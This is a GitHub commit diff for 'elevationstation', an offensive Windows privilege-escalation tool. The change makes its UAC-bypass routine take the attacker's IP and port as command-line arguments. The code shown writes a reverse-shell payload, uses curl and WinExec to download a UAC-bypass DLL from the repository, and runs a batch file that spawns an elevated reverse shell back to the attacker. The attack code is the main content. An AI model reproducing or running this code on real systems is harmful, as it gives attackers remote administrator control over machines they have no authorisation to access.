Skip to content

Commit 112b76c

Browse files
g3tsyst3mg3tsyst3m
committed
replacing input() with cmd args
c++ input() can be problematic. Switching to using commandline args for input instead
1 parent ba521d9 commit 112b76c

File tree

1 file changed

+16
-11
lines changed

1 file changed

+16
-11
lines changed

elevationstation/elevationstation.cpp

Lines changed: 16 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -845,7 +845,7 @@ int DupProcessToken(DWORD pid)
845845

846846
}
847847

848-
void uacbypass()
848+
void uacbypass(char* theip, char* theport)
849849
{
850850
DWORD procintegrity=CheckProcessIntegrity(GetCurrentProcessId());
851851
if (procintegrity != 0x3000)
@@ -862,12 +862,16 @@ void uacbypass()
862862
exit(0);
863863
}
864864

865+
866+
string revip = theip;
867+
string portnum = theport;
868+
865869
cout << "generating rev shell payload now...\n";
866-
string revip, portnum;
867-
cout << "enter the ip for your attacker box for the rev3rse sh3ll:\n";
868-
cin >> revip;
869-
cout << "enter the port number for the rev3rse sh3ll:\n";
870-
cin >> portnum;
870+
//string revip, portnum;
871+
//cout << "enter the ip for your attacker box for the rev3rse sh3ll:\n";
872+
//cin >> revip;
873+
//cout << "enter the port number for the rev3rse sh3ll:\n";
874+
//cin >> portnum;
871875

872876
ofstream mypayload;
873877
mypayload.open("c:\\users\\public\\elevationstation.js");
@@ -911,10 +915,11 @@ void uacbypass()
911915
WinExec("curl -# -L -o \"c:\\temp\\netutils.dll\" \"https://github.com/g3tsyst3m/elevationstation/raw/main/uacbypass_files/netutils.dll\"", 0); //UAC byp@ss DLL, downloaded directly from the elevationstation repo folder
912916
Color(2);
913917
cout << "[+] while waiting for download to finish, go ahead and start your listener on your attacker box\n";
914-
cout << "You can see the download progress for two files in your foothold reverse shell ;)\nhit [enter] when both reach 100 percent and enjoy your newly spawned elevated shell!\n";
918+
//cout << "You can see the download progress for two files in your foothold reverse shell ;)\nhit [enter] when both reach 100 percent and enjoy your newly spawned elevated shell!\n";
915919
Color(7);
916-
cin.get();
917-
cin.get();
920+
Sleep(7000);
921+
//cin.get();
922+
//cin.get();
918923
WinExec("c:\\users\\public\\elevateit.bat", 0);
919924

920925
}
@@ -927,7 +932,7 @@ void commandlist()
927932
printf("usage: elevationstation.exe -p 1234 -d\n");
928933
printf("usage: elevationstation.exe -p 1234 -dt\n");
929934
printf("usage: elevationstation.exe -np\n");
930-
printf("usage: elevationstation.exe -uac\n");
935+
printf("usage: elevationstation.exe -uac attackerip port\n");
931936
printf("usage: elevationstation.exe -p 1234 -dll\n");
932937
printf("usage: elevationstation.exe -lcp\n");
933938
printf("usage: elevationstation.exe -p 1234 -l\n");
@@ -968,7 +973,7 @@ int main(int argc, char* argv[])
968973
}
969974
if (strcmp(argv[1], "-uac") == 0)
970975
{
971-
uacbypass();
976+
uacbypass(argv[2], argv[3]);
972977
exit(0);
973978
}
974979
if (strcmp(argv[1], "-lcp") == 0)

0 commit comments

Comments
 (0)